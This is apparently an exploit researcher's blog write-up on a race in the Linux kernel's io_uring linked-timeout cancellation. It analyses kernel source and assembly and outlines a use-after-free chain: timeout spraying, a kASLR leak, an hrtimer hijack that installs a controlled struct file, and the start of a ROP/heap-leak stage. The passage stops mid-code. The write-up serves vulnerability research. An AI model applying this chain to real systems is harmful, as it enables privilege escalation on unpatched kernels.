Exploiting a vulnerability in the io_uring
subsystem of the Linux kernel.
Introduction
In this post I will dive into a bug I discovered in the io_uring
subsystem, which involves racing and canceling a linked timeout.
But first, why io_uring
?
One of the driving factors behind my explo(ration/itation) of this subsystem is Google’s kCTF
program. This unique initiative offers substantial rewards, up to $133,337 for successfully exploiting a Linux kernel bug within a nsjail
environment. Motivated by the prospect of participating in this program, I began researching previous write-ups and interestingly, a lot of them targeted io_uring
. Also, time was of the essence, as Google was preparing to make changes to the program, which would disable the io_uring
for the most lucrative bounties. With this deadline looming, I embarked on my journey to uncover yet another vulnerability in the io_uring
subsystem.
IO_URING
Tons of writeups have already explained (and exploited) various parts of the io_uring
subsystem better than I ever could so please read them:
- CVE-2022-2602: DirtyCred - @kiks
- CVE-2022-2602: DirtyCred Remastered - @LukeGix
- CVE-2022-1786: A Journey To The Dawn - @ky1ebot
- CVE-2022-29582 - @Awarau1 & @pql
- io_register_pbuf_ring @dawnseclab
- CVE-2021-41073: new code, new bugs, and a new exploit technique @junr0n
- CVE-2021–20226: Reference counting bug - @Ga_ryo_
- CVE-2021-41073: Put an io_uring on it - @chompie
In this post I aim to build upon these and specifically CVE-2022-29582, due to the similarities with timeouts.
Within io_uring
there are a lot of different operations one can use (40 in v5.15.89
). I will just explain the relevant parts of the ones I used to trigger and exploit the bug.
Asynchronous Requests
For this post its just important to know that operations can be executed simultaneously using this flag.
IORING_OP_TIMEOUT
The IORING_OP_TIMEOUT
operation allows developers to use timeouts. More information can be found in CVE-2022-29582#timeout-operations-ioring_op_timeout.
IORING_OP_LINK_TIMEOUT
The IORING_OP_LINK_TIMEOUT
operation allows developers to add a timeout to the previous request in the chain. This request is first prepped and then armed.
Since sqe (submission queue entry) can be evaluated in various contexts (asynchronous, syscall), the preparation and arming of such a request may occur in different location:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
static void __io_queue_sqe(struct io_kiocb *req)
__must_hold(&req->ctx->uring_lock)
{
struct io_kiocb *linked_timeout;
int ret;
issue_sqe:
ret = io_issue_sqe(req, IO_URING_F_NONBLOCK|IO_URING_F_COMPLETE_DEFER);
// ...
if (likely(!ret)) {
linked_timeout = io_prep_linked_timeout(req);
if (linked_timeout)
io_queue_linked_timeout(linked_timeout);
} else if (ret == -EAGAIN && !(req->flags & REQ_F_NOWAIT)) {
linked_timeout = io_prep_linked_timeout(req);
switch (io_arm_poll_handler(req)) {
case IO_APOLL_READY:
if (linked_timeout)
io_queue_linked_timeout(linked_timeout);
goto issue_sqe;
// ...
}
if (linked_timeout)
io_queue_linked_timeout(linked_timeout);
}
// ...
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
static void io_wq_submit_work(struct io_wq_work *work)
{
struct io_kiocb *req = container_of(work, struct io_kiocb, work);
struct io_kiocb *timeout;
int ret = 0;
// ...
timeout = io_prep_linked_timeout(req);
if (timeout)
io_queue_linked_timeout(timeout);
// ...
if (!ret) {
do {
ret = io_issue_sqe(req, 0);
// ..
} while (1);
}
// ...
}
1
2
3
4
5
6
7
8
9
10
static void io_queue_async_work(struct io_kiocb *req, bool *locked)
{
struct io_ring_ctx *ctx = req->ctx;
struct io_kiocb *link = io_prep_linked_timeout(req);
// ...
io_wq_enqueue(tctx->io_wq, &req->work);
if (link)
io_queue_linked_timeout(link);
// ...
}
Notice how all of these requests first call io_prep_linked_timeout
before calling io_issue_sqe
/ io_wq_enqueue
except for __io_queue_sqe
.
Lets look a bit closer at the io_prep_linked_timeout
method:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
static inline struct io_kiocb *io_prep_linked_timeout(struct io_kiocb *req)
{
if (likely(!(req->flags & REQ_F_ARM_LTIMEOUT)))
return NULL;
return __io_prep_linked_timeout(req);
}
static struct io_kiocb *__io_prep_linked_timeout(struct io_kiocb *req)
{
if (WARN_ON_ONCE(!req->link))
return NULL;
req->flags &= ~REQ_F_ARM_LTIMEOUT;
req->flags |= REQ_F_LINK_TIMEOUT;
/* linked timeouts should have two refs once prep'ed */
io_req_set_refcount(req);
__io_req_set_refcount(req->link, 2);
return req->link;
}
It becomes clear that a request can only be prepped if it has the REQ_F_ARM_LTIMEOUT
flag (ready to be armed) and will then transition to the REQ_F_LINK_TIMEOUT
flag (indicating the request has been armed).
Lets look a bit closer at the io_queue_linked_timeout
method:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
static void io_queue_linked_timeout(struct io_kiocb *req)
{
struct io_ring_ctx *ctx = req->ctx;
spin_lock_irq(&ctx->timeout_lock);
/*
* If the back reference is NULL, then our linked request finished
* before we got a chance to setup the timer
*/
if (req->timeout.head) {
struct io_timeout_data *data = req->async_data;
data->timer.function = io_link_timeout_fn;
hrtimer_start(&data->timer, timespec64_to_ktime(data->ts),
data->mode);
list_add_tail(&req->timeout.list, &ctx->ltimeout_list);
}
spin_unlock_irq(&ctx->timeout_lock);
/* drop submission reference */
io_put_req(req);
}
This will start the linked timeout and add it to the ctx->ltimeout_list
list.
IORING_OP_TIMEOUT_REMOVE
This operation allows developers to remove / cancel regular timeouts and update regular and linked timeouts. Updating works as follows:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
static int io_timeout_update(struct io_ring_ctx *ctx, __u64 user_data,
struct timespec64 *ts, enum hrtimer_mode mode)
__must_hold(&ctx->timeout_lock)
{
struct io_kiocb *req = io_timeout_extract(ctx, user_data);
struct io_timeout_data *data;
if (IS_ERR(req))
return PTR_ERR(req);
req->timeout.off = 0; /* noseq */
data = req->async_data;
list_add_tail(&req->timeout.list, &ctx->timeout_list);
hrtimer_init(&data->timer, io_timeout_get_clock(data), mode);
data->timer.function = io_timeout_fn;
hrtimer_start(&data->timer, timespec64_to_ktime(*ts), mode);
return 0;
}
static int io_linked_timeout_update(struct io_ring_ctx *ctx, __u64 user_data,
struct timespec64 *ts, enum hrtimer_mode mode)
__must_hold(&ctx->timeout_lock)
{
struct io_timeout_data *io;
struct io_kiocb *req;
bool found = false;
list_for_each_entry(req, &ctx->ltimeout_list, timeout.list) {
found = user_data == req->user_data;
if (found)
break;
}
if (!found)
return -ENOENT;
io = req->async_data;
if (hrtimer_try_to_cancel(&io->timer) == -1)
return -EALREADY;
hrtimer_init(&io->timer, io_timeout_get_clock(io), mode);
io->timer.function = io_link_timeout_fn;
hrtimer_start(&io->timer, timespec64_to_ktime(*ts), mode);
return 0;
}
For linked timeouts it first tries to find the ltimeout in the ctx->ltimeout_list
, while io_timeout_extract
locates the timeouts in ctx->timeout_list
. Other than that the functions could be used interchangeably if a regular timeout is somehow able to get into the ctx->ltimeout_list
.
IORING_OP_POLL_ADD
The IORING_OP_POLL_ADD
operation allows developers to use polling.
IORING_OP_POLL_REMOVE
The IORING_OP_POLL_REMOVE
operation allows developers to remove / update poll requests. It works by first finding the poll request, based on the provided user_data
(io_poll_find
) and subsequently cancels the request by invoking io_req_complete
with that poll request, which in turn calls __io_req_complete
and io_req_complete_post
:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
static int io_poll_update(struct io_kiocb *req, unsigned int issue_flags)
{
struct io_ring_ctx *ctx = req->ctx;
struct io_kiocb *preq;
int ret2, ret = 0;
spin_lock(&ctx->completion_lock);
preq = io_poll_find(ctx, req->poll_update.old_user_data, true);
if (!preq || !io_poll_disarm(preq)) {
spin_unlock(&ctx->completion_lock);
ret = preq ? -EALREADY : -ENOENT;
goto out;
}
spin_unlock(&ctx->completion_lock);
// ...
req_set_fail(preq);
io_req_complete(preq, -ECANCELED);
out:
if (ret < 0)
req_set_fail(req);
/* complete update request, we're done with it */
io_req_complete(req, ret);
return 0;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
static void io_req_complete_post(struct io_kiocb *req, s32 res,
u32 cflags)
{
struct io_ring_ctx *ctx = req->ctx;
spin_lock(&ctx->completion_lock);
__io_fill_cqe(ctx, req->user_data, res, cflags);
/*
* If we're the last reference to this request, add to our locked
* free_list cache.
*/
if (req_ref_put_and_test(req)) {
if (req->flags & (REQ_F_LINK | REQ_F_HARDLINK)) {
if (req->flags & IO_DISARM_MASK)
io_disarm_next(req);
if (req->link) {
io_req_task_queue(req->link);
req->link = NULL;
}
}
io_dismantle_req(req);
io_put_task(req->task, 1);
list_add(&req->inflight_entry, &ctx->locked_free_list);
ctx->locked_free_nr++;
} else {
if (!percpu_ref_tryget(&ctx->refs))
req = NULL;
}
io_commit_cqring(ctx);
spin_unlock(&ctx->completion_lock);
if (req) {
io_cqring_ev_posted(ctx);
percpu_ref_put(&ctx->refs);
}
}
This method completes the current request and creates a new cqe
. Afterwards it calls io_disarm_next
:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
static bool io_disarm_next(struct io_kiocb *req)
__must_hold(&req->ctx->completion_lock)
{
bool posted = false;
if (req->flags & REQ_F_ARM_LTIMEOUT) { // [1]
struct io_kiocb *link = req->link;
req->flags &= ~REQ_F_ARM_LTIMEOUT;
if (link && link->opcode == IORING_OP_LINK_TIMEOUT) {
io_remove_next_linked(req);
io_fill_cqe_req(link, -ECANCELED, 0);
io_put_req_deferred(link);
posted = true;
}
} else if (req->flags & REQ_F_LINK_TIMEOUT) { // [2]
struct io_ring_ctx *ctx = req->ctx;
spin_lock_irq(&ctx->timeout_lock);
posted = io_kill_linked_timeout(req);
spin_unlock_irq(&ctx->timeout_lock);
}
if (unlikely((req->flags & REQ_F_FAIL) &&
!(req->flags & REQ_F_HARDLINK))) {
posted |= (req->link != NULL);
io_fail_links(req);
}
return posted;
}
Taking the first path [1]
, the request is checked for the ready to be armed flag. If it has the flag, the flag is removed, and the request is subsequently completed.
The second path [2]
, on the other hand, checks whether the request has already been armed. In such a scenario, the linked request (ltimeout
) is canceled accordingly.
Looks good right?
Important to note here is that the chain of functions here are all called directly after each other, which is different compared to other cancel requests, i.e IORING_OP_TIMEOUT_REMOVE
:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
static int io_timeout_remove(struct io_kiocb *req, unsigned int issue_flags)
{
struct io_timeout_rem *tr = &req->timeout_rem;
struct io_ring_ctx *ctx = req->ctx;
int ret;
if (!(req->timeout_rem.flags & IORING_TIMEOUT_UPDATE)) {
spin_lock(&ctx->completion_lock);
spin_lock_irq(&ctx->timeout_lock);
ret = io_timeout_cancel(ctx, tr->addr);
spin_unlock_irq(&ctx->timeout_lock);
spin_unlock(&ctx->completion_lock);
}
// ...
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
static int io_timeout_cancel(struct io_ring_ctx *ctx, __u64 user_data)
__must_hold(&ctx->completion_lock)
__must_hold(&ctx->timeout_lock)
{
struct io_kiocb *req = io_timeout_extract(ctx, user_data);
if (IS_ERR(req))
return PTR_ERR(req);
req_set_fail(req);
io_fill_cqe_req(req, -ECANCELED, 0);
io_put_req_deferred(req);
return 0;
}
Which calls io_put_req_deferred
:
1
2
3
4
5
6
7
static inline void io_put_req_deferred(struct io_kiocb *req)
{
if (req_ref_put_and_test(req)) {
req->io_task_work.func = io_free_req_work;
io_req_task_work_add(req);
}
}
Which eventually also calls io_disarm_next
, but its executed as task_work
, which has some delay.
LinkedPoll
Now, having gained some insight into the various operations let’s dive into what occurs when we introduce concurrency.
Remember the io_disarm_next
:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
static bool io_disarm_next(struct io_kiocb *req)
__must_hold(&req->ctx->completion_lock)
{
bool posted = false;
if (req->flags & REQ_F_ARM_LTIMEOUT) { // [1]
struct io_kiocb *link = req->link;
req->flags &= ~REQ_F_ARM_LTIMEOUT;
if (link && link->opcode == IORING_OP_LINK_TIMEOUT) {
io_remove_next_linked(req);
io_fill_cqe_req(link, -ECANCELED, 0);
io_put_req_deferred(link);
posted = true;
}
} else if (req->flags & REQ_F_LINK_TIMEOUT) { // [2]
struct io_ring_ctx *ctx = req->ctx;
spin_lock_irq(&ctx->timeout_lock);
posted = io_kill_linked_timeout(req);
spin_unlock_irq(&ctx->timeout_lock);
}
if (unlikely((req->flags & REQ_F_FAIL) &&
!(req->flags & REQ_F_HARDLINK))) {
posted |= (req->link != NULL);
io_fail_links(req);
}
return posted;
}
and the io_prep_linked_timeout
:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
static inline struct io_kiocb *io_prep_linked_timeout(struct io_kiocb *req)
{
if (likely(!(req->flags & REQ_F_ARM_LTIMEOUT))) // [3]
return NULL;
return __io_prep_linked_timeout(req);
}
static struct io_kiocb *__io_prep_linked_timeout(struct io_kiocb *req)
{
if (WARN_ON_ONCE(!req->link))
return NULL;
req->flags &= ~REQ_F_ARM_LTIMEOUT;
req->flags |= REQ_F_LINK_TIMEOUT;
/* linked timeouts should have two refs once prep'ed */
io_req_set_refcount(req);
__io_req_set_refcount(req->link, 2); // [4]
return req->link;
}
Now, what would happen when we could somehow arm a linked timeout while canceling it at the same time. In this case we would take the first path in the io_disarm_next
function [1]
(Not yet armed), and we would also pass the check in io_prep_linked_timeout
([3]
), after which the io_queue_linked_timeout
would actually start the timer. After this point, we would have a timer running while its parent request has already been completed.
%%{init: {'noteMargin':13}}%%
sequenceDiagram
participant t1 as Thread 1 (io_disarm_next)
participant t2 as Thread 2 (io_prep_linked_timeout)
t1->t2: -
Note over t1: if (req->flags & REQ_F_ARM_LTIMEOUT) {
Note over t2: if (likely(!(req->flags & REQ_F_ARM_LTIMEOUT)))
Note over t1: req->flags &= ~REQ_F_ARM_LTIMEOUT;
Note over t2: req->flags &= ~REQ_F_ARM_LTIMEOUT;
Note over t2: req->flags |= REQ_F_LINK_TIMEOUT;
Note over t2: io_queue_linked_timeout(timeout)
Note over t1: io_remove_next_linked(req);
Note over t1: ...
Note over t2: ...
t1->t2: -
The linked timeout is still being queued despite its parent being disarmed.
But, how do we actually cancel a linked timeout while simultaneously arming it?
Introducing IORING_OP_POLL_ADD
and IORING_OP_POLL_REMOVE
. As seen before, using IORING_OP_POLL_REMOVE
to cancel a IORING_OP_POLL_ADD
request cancels the request inline (Doesn’t involve extra task work). This in combination with queueing the request via __io_queue_sqe
, means that first the request is evaluated, then the ltimeout
is armed, meaning that if we use a well timed cancel request (asynchronous), we could trigger the path described earlier.
From now on, I’ll refer to our dangling linked timeout as
ltimeout
However, let’s pause for a moment and take notice of the io_remove_next_linked
function:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
static bool io_disarm_next(struct io_kiocb *req)
__must_hold(&req->ctx->completion_lock)
{
bool posted = false;
if (req->flags & REQ_F_ARM_LTIMEOUT) { // [1]
struct io_kiocb *link = req->link;
req->flags &= ~REQ_F_ARM_LTIMEOUT;
if (link && link->opcode == IORING_OP_LINK_TIMEOUT) {
io_remove_next_linked(req); // [5]
// ...
} // ...
} // ...
}
static inline void io_remove_next_linked(struct io_kiocb *req)
{
struct io_kiocb *nxt = req->link;
req->link = nxt->link;
nxt->link = NULL;
}
static struct io_kiocb *__io_prep_linked_timeout(struct io_kiocb *req)
{
if (WARN_ON_ONCE(!req->link))
return NULL;
req->flags &= ~REQ_F_ARM_LTIMEOUT;
req->flags |= REQ_F_LINK_TIMEOUT;
/* linked timeouts should have two refs once prep'ed */
io_req_set_refcount(req);
__io_req_set_refcount(req->link, 2); // [4]
return req->link;
}
In this context req->link
is our ltimeout
, and so it sets req->link = ltimeout->link
, which effectively removes the reference to ltimeout
. Meaning that io_prep_linked_timeout
could return ltimeout->link
if we’re unlucky, which is fine because we can ensure its NULL
, but __io_req_set_refcount(req->link, 2);
([4]
) is a problem because it almost surely does a NULL
pointer dereference. Lets analyse this further and look at how this is all implemented in assembly:
io_disarm_next
:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
00008e01: test eax, 0x100000
00008e06: je 0x8e4b
00008e08: mov edx, eax
00008e0a: mov rbp, qword [rdi+0x70]
00008e0e: and edx, 0xffefffff ; [1]
00008e14: mov dword [rdi+0x58], edx
00008e17: test rbp, rbp
00008e1a: je 0x8edc
00008e20: cmp byte [rbp+0x48], 0xf
00008e24: je 0x8f7b
...
00008f7b: mov rax, qword [rbp+0x70]
00008f7f: mov edx, 0xffffff83
00008f84: mov qword [rdi+0x70], rax ; [2]
00008f88: mov rsi, qword [rbp+0x68]
00008f8c: mov qword [rbp+0x70], 0x0
So it takes 8 instructions to set req->link = ltimeout->link
.
__io_queue_sqe
-> __io_prep_linked_timeout
:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
00010279: test eax, 0x100000 ; [3]
0001027e: je 0x1024d
00010280: mov rdi, r12
00010283: call __io_prep_linked_timeout
__io_prep_linked_timeout:
00001af0: call __fentry__
00001af5: mov rax, qword [rdi+0x70] ; [4]
00001af9: test rax, rax ; if (WARN_ON_ONCE(!req->link))
00001afc: je 0x1b4d ; return NULL;
00001afe: mov ecx, dword [rdi+0x58]
00001b01: mov edx, ecx
00001b03: and edx, 0xffefffff ; req->flags &= ~REQ_F_ARM_LTIMEOUT;
00001b09: and ecx, 0x80000 ; req->flags |= REQ_F_LINK_TIMEOUT;
00001b0f: je 0x1b3b ; io_req_set_refcount(req);
00001b11: or dh, 0x10
00001b14: mov dword [rdi+0x58], edx
00001b17: mov edx, dword [rax+0x58]
00001b1a: test edx, 0x80000
00001b20: jne 0x1b36
00001b22: or edx, 0x80000
00001b28: mov dword [rax+0x5c], 0x2 ; __io_req_set_refcount(req->link, 2);
00001b2f: mov dword [rax+0x58], edx ; req->flags |= REQ_F_REFCOUNT;
00001b32: mov rax, qword [rdi+0x70] ; return req->link;
00001b36: jmp __x86_return_thunk
__fentry__:
#ifdef CONFIG_DYNAMIC_FTRACE
SYM_FUNC_START(__fentry__)
RET
SYM_FUNC_END(__fentry__)
EXPORT_SYMBOL(__fentry__)
; ...
#endif
In the .config we’re given
CONFIG_DYNAMIC_FTRACE=y
is set so__fentry__
is onlyRET
This means we’re lucky! It reuses / optimized rax
from the beginning of the function when checking for req->link = NULL
to calling __io_req_set_refcount(req->link, 2);
and thus the race window becomes a bit more favourable.
Let’s assume worst case scenario and assume that the test at __io_queue_sqe
([3]
) is done at the same time as removing the flag in io_disarm_next
([1]
). For io_disarm_next
there are 8
instructions before it sets req->link = ltimeout->link
, while there are only 6
instructions to reach setting rax = req->link
([4]
) (But lets hope our CPU does some optimizations regarding the call __fentry__
).
While we can’t just assume that this will be fine, because 6 < 8
(due to instruction clock cycles and CPU optimizations). In practice, I have never actually been able to trigger req->link = ltimeout->link
before setting rax = req->link
.
Exploitation
Triggered?
Now knowing how to successfully trigger the bug, the challenge now lies in identifying whether the bug has actually been triggered. This is crucial, because the race window is extremely tight, and it often (Depending on CPU) requires numerous attempts to trigger the bug. Moreover, repeatedly redoing the entire exploitation phase, including heap feng shui and other steps, for each try can be extremely time-consuming.
So does our free’d linked timeout leave some dirt behind?
Let’s look a bit closer at the IORING_OP_LINK_TIMEOUT
from the previous section. We’ve seen that the ltimeout
is added to the ctx->ltimeout_list
, however, its not actually removed from the list (Because according to io_disarm_next
it was not yet armed). So this is a way for us to figure out if we’ve triggered it.
In short, there is still a reference to the linked timeout in the ctx->ltimeout_list
, meaning that we could execute a IORING_OP_TIMEOUT_REMOVE
with LINKED_TIMEOUT
flag, which would cancel our free’d ltimeout.
But this is not actually what we want, we want to keep our ltimeout
alive. Thankfully, io_uring
reuses free’d requests and adds them to a locked_free_list
once they are completed as seen in io_req_complete_post
;
Which is later flushed when calling io_alloc_req
, this in turn calls io_flush_cached_reqs
and it finally calls io_flush_cached_locked_reqs
and joins the ctx->locked_free_list
and the ctx->submit_state.free_list
:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
/*
* A request might get retired back into the request caches even before opcode
* handlers and io_issue_sqe() are done with it, e.g. inline completion path.
* Because of that, io_alloc_req() should be called only under ->uring_lock
* and with extra caution to not get a request that is still worked on.
*/
static struct io_kiocb *io_alloc_req(struct io_ring_ctx *ctx)
__must_hold(&ctx->uring_lock)
{
// ...
BUILD_BUG_ON(ARRAY_SIZE(state->reqs) < IO_REQ_ALLOC_BATCH);
if (likely(state->free_reqs || io_flush_cached_reqs(ctx)))
goto got_req;
// ...
got_req:
state->free_reqs--;
return state->reqs[state->free_reqs];
}
/* Returns true IFF there are requests in the cache */
static bool io_flush_cached_reqs(struct io_ring_ctx *ctx)
{
struct io_submit_state *state = &ctx->submit_state;
int nr;
/*
* If we have more than a batch's worth of requests in our IRQ side
* locked cache, grab the lock and move them over to our submission
* side cache.
*/
if (READ_ONCE(ctx->locked_free_nr) > IO_COMPL_BATCH) // IO_COMPL_BATCH == 32
io_flush_cached_locked_reqs(ctx, state);
nr = state->free_reqs;
while (!list_empty(&state->free_list)) {
struct io_kiocb *req = list_first_entry(&state->free_list,
struct io_kiocb, inflight_entry);
list_del(&req->inflight_entry);
state->reqs[nr++] = req;
if (nr == ARRAY_SIZE(state->reqs))
break;
}
state->free_reqs = nr;
return nr != 0;
}
i
static void io_flush_cached_locked_reqs(struct io_ring_ctx *ctx,
struct io_submit_state *state)
{
spin_lock(&ctx->completion_lock);
list_splice_init(&ctx->locked_free_list, &state->free_list);
ctx->locked_free_nr = 0;
spin_unlock(&ctx->completion_lock);
}
So our ltimeout
is in the ctx->locked_free_list
when its being free’d, to figure out whether the bug has been triggered we can spray a ton of IORING_OP_TIMEOUT
requests and reclaim the ltimeout
in the ctx->ltimeout_list
as a IORING_OP_TIMEOUT
, then we can add a single IORING_OP_TIMEOUT_REMOVE
with the LINKED_TIMEOUT
flag.
Here I stumbled on a small difference, I initially compiled the kernel with
gcc
, while the actual kernel was compiled withclang
and with thegcc
version, it was enough to only spray 64 objects, while for the actual version it took way more.
Then when the remove request is being executed it will try to find the ltimeout
in the ctx->ltimeout_list
list (At this time its actually just a regular timeout) and if it succeeds, meaning we’ve triggered the UAF, it will just update the regular timeout.
Thankfully the update functions for the two different timeout operations are very similar and can be called interchangeably as seen before.
Replacing the ltimeout
I hoped to exploit the bug in similar fashion to CVE-2022-29582, sadly it took me a very long time to figure out the following:
1
2
3
4
5
6
7
8
9
10
11
static int calculate_sizes(struct kmem_cache *s, int forced_order)
{
//...
/*
* Store freelist pointer near middle of object to keep
* it away from the edges of the object to avoid small
* sized over/underflows from neighboring allocations.
*/
s->offset = ALIGN_DOWN(s->object_size / 2, sizeof(void *));
//...
}
1
$ pahole io_timeout_data ./vmlinux -E 2> /dev/null
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
struct io_timeout_data {
struct io_kiocb * req; /* 0 8 */
struct hrtimer {
struct timerqueue_node {
struct rb_node {
long unsigned int __rb_parent_color; /* 8 8 */
struct rb_node * rb_right; /* 16 8 */
struct rb_node * rb_left; /* 24 8 */
} node; /* 8 24 */
/* typedef ktime_t -> s64 -> __s64 */ long long int expires; /* 32 8 */
} node; /* 8 32 */
/* typedef ktime_t -> s64 -> __s64 */ long long int _softexpires; /* 40 8 */
enum hrtimer_restart (*function)(struct hrtimer *); /* 48 8 */
struct hrtimer_clock_base * base; /* 56 8 */
/* --- cacheline 1 boundary (64 bytes) --- */
/* typedef u8 -> __u8 */ unsigned char state; /* 64 1 */
/* typedef u8 -> __u8 */ unsigned char is_rel; /* 65 1 */
/* typedef u8 -> __u8 */ unsigned char is_soft; /* 66 1 */
/* typedef u8 -> __u8 */ unsigned char is_hard; /* 67 1 */
} timer; /* 8 64 */
/* XXX last struct has 4 bytes of padding */
struct timespec64 {
/* typedef time64_t -> __s64 */ long long int tv_sec; /* 72 8 */
long int tv_nsec; /* 80 8 */
} ts; /* 72 16 */
enum hrtimer_mode mode; /* 88 4 */
/* typedef u32 -> __u32 */ unsigned int flags; /* 92 4 */
/* size: 96, cachelines: 2, members: 5 */
/* paddings: 1, sum paddings: 4 */
/* last cacheline: 32 bytes */
};
So after kfree
is called on our io_timeout_data
object, the freelist
pointer is placed at the exact same offset (96/2 = 48
) as the hrtimer_restart
pointer, therefore there is no way to trigger the io_link_timeout_fn
.
kASLR
With the above idea failing, a new idea is to control the heap such that the previously free’d request->async_data
lies under our control. The goal is to control almost a full kmalloc-96
object because the rbtree
properties lie in the first few bytes of the object. Secondly, we’d need a kASLR leak to find a function to call.
Thankfully, theres no need to overcomplicate things, because there exists a full kaslr leak up till ~v6.2, called entrybleed, more details here. Now, when the timer is succesfully reallocated, its possible to call anything once, where the first parameter is a reference to the timer itself, and the initial bytes are beyond our control (Due to timer constraints). Sadly, I could not find any gadgets that could simply call a full ROP chain.
Dirty File
Before going further lets take a look at how our arbitrary function is actually called:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
static void __run_hrtimer(struct hrtimer_cpu_base *cpu_base,
struct hrtimer_clock_base *base,
struct hrtimer *timer, ktime_t *now,
unsigned long flags) __must_hold(&cpu_base->lock)
{
//...
__remove_hrtimer(timer, base, HRTIMER_STATE_INACTIVE, 0);
fn = timer->function;
//...
restart = fn(timer);
//...
/*
* Note: We clear the running state after enqueue_hrtimer and
* we do not reprogram the event hardware. Happens either in
* hrtimer_start_range_ns() or in hrtimer_interrupt()
*
* Note: Because we dropped the cpu_base->lock above,
* hrtimer_start_range_ns() can have popped in and enqueued the timer
* for us already.
*/
if (restart != HRTIMER_NORESTART &&
!(timer->state & HRTIMER_STATE_ENQUEUED))
enqueue_hrtimer(timer, base, HRTIMER_MODE_ABS);
//...
}
static void __remove_hrtimer(struct hrtimer *timer,
struct hrtimer_clock_base *base,
u8 newstate, int reprogram)
{
// ...
WRITE_ONCE(timer->state, newstate);
if (!(state & HRTIMER_STATE_ENQUEUED))
return;
if (!timerqueue_del(&base->active, &timer->node))
cpu_base->active_bases &= ~(1 << base->index);
// ...
}
The __run_hrtimer
function first makes sure to remove our timer from the rbtree
by calling __remove_hrtimer
, which makes sure the HRTIMER_STATE_ENQUEUED
flag is set and will gracefully remove the timer and overwrite the timer->state
with HRTIMER_STATE_INACTIVE
. It is essential to remove the timer to avoid calling the same function infinitely many times, which is very bad, so we need to set the HRTIMER_STATE_ENQUEUED
state.
Then __run_hrtimer
calls our function and only if it returned HRTIMER_NORESTART
(0x00
) and our state does not have the HRTIMER_STATE_ENQUEUED
flag set (it was just overwritten), it doesn’t enqueue the timer again.
So in summary besides our single function call, our function needs to return 0x00
. The way to exploit this is to install a fake file object and control it.
To do this we want to call fd_install
:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
/*
* Install a file pointer in the fd array.
*
* The VFS is full of places where we drop the files lock between
* setting the open_fds bitmap and installing the file in the file
* array. At any such point, we are vulnerable to a dup2() race
* installing a file in the array before us. We need to detect this and
* fput() the struct file we are about to overwrite in this case.
*
* It should never happen - if we allow dup2() do it, _really_ bad things
* will follow.
*
* This consumes the "file" refcount, so callers should treat it
* as if they had called fput(file).
*/
void fd_install(unsigned int fd, struct file *file)
And in our case we call receive_fd
:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
int receive_fd(struct file *file, unsigned int o_flags)
{
return __receive_fd(file, NULL, o_flags);
}
/**
* __receive_fd() - Install received file into file descriptor table
* @file: struct file that was received from another process
* @ufd: __user pointer to write new fd number to
* @o_flags: the O_* flags to apply to the new fd entry
*
* Installs a received file into the file descriptor table, with appropriate
* checks and count updates. Optionally writes the fd number to userspace, if
* @ufd is non-NULL.
*
* This helper handles its own reference counting of the incoming
* struct file.
*
* Returns newly install fd or -ve on error.
*/
int __receive_fd(struct file *file, int __user *ufd, unsigned int o_flags)
{
int new_fd;
int error;
error = security_file_receive(file);
if (error)
return error;
new_fd = get_unused_fd_flags(o_flags);
if (new_fd < 0)
return new_fd;
if (ufd) {
error = put_user(new_fd, ufd);
if (error) {
put_unused_fd(new_fd);
return error;
}
}
fd_install(new_fd, get_file(file));
__receive_sock(file);
return new_fd;
}
And luckily __receive_fd
:
Returns newly install fd or -ve on error.
By calling close
on fd-0
(stdin
) before the timer fires, we can ensure that the function returns 0x00
.
After __receive_fd
has been called and our dirty file has been installed, the initial UAF has been transformed into an UAF on a struct file
object, which is much more useful.
sizeof(struct file) == 232
so to control every field of thestruct file
object we need to controlceil(232 / 92) == 3
objects.
f_ops / Heap leak
Before we continue, what can we actually do with the dirty file. Given that we control the first chunk of the file object, we can overwrite f_ops
to point to some arbitrary function (As long as the kernel has a pointer to that function).
In this case it was the easiest to first get a heap leak and construct a ROP chain in the chunks following that one. To get a heap leak there exists netdev_init
:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
/* Initialize per network namespace state */
static int __net_init netdev_init(struct net *net)
{
BUILD_BUG_ON(GRO_HASH_BUCKETS >
8 * sizeof_field(struct napi_struct, gro_bitmask));
INIT_LIST_HEAD(&net->dev_base_head);
